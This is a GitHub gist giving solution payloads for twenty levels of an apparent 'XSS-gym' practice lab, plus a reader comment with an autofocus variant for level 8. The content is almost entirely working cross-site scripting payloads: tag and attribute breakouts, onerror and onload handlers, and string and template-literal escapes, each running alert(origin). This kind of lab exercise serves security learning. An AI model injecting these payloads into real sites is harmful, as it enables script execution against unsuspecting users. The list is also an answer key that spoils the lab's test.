Skip to content

Instantly share code, notes, and snippets.

@blackvoidx

blackvoidx/Xss-gym.txt

Last active February 16, 2025 10:20
Show Gist options
  • Save blackvoidx/c7bc28a9d55727b8c847e2f83df04416 to your computer and use it in GitHub Desktop.
Save blackvoidx/c7bc28a9d55727b8c847e2f83df04416 to your computer and use it in GitHub Desktop.
Download ZIP
XSS-gym
Raw
Xss-gym.txt
level-1 => test</title><script>alert(origin)</script>
level-2 => test</noscript><script>alert(origin)</script>
level-3 => red;}</style><script>alert(origin)</script>
level-4 => %26apos;-alert(origin)-%26apos; <- OR -> %26apos;,alert(origin),%26apos;
level-5 => test<img src='x' onerror='alert(origin)'/>
level-6 => "><img src='x' onerror='alert(origin)'/> //
level-7 => '><img src='x' onerror='alert(origin)'\/>
level-8 => "onfocus="eval(alert(origin))
level-9 => 'onfocus='eval(alert(origin))
level-10 => test</textarea><img src='x' onerror='alert(origin)'/> //
level-11 => </script><svg/onload=alert(origin)>
level-12 => </script><svg/onload=alert(origin)>
level-13 => test';eval(alert(origin)) //
level-14 => test";eval(alert(origin)) //
level-15 => test\';eval(alert(origin)) //
level-16 => test\";eval(alert(origin)) //
level-17 => </script><svg/onload=alert(origin)>
level-18 => test`;eval(alert(origin)) //
level-19 => test\`;eval(alert(origin)) //
level-20 => ${alert(origin)}
@mhDalily
Copy link

i think in level 8 you should use => "%20autofocus%20onfocus=alert(origin)%20"

@blackvoidx
Copy link
Author

i think in level 8 you should use => "%20autofocus%20onfocus=alert(origin)%20"

Yes, its true

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment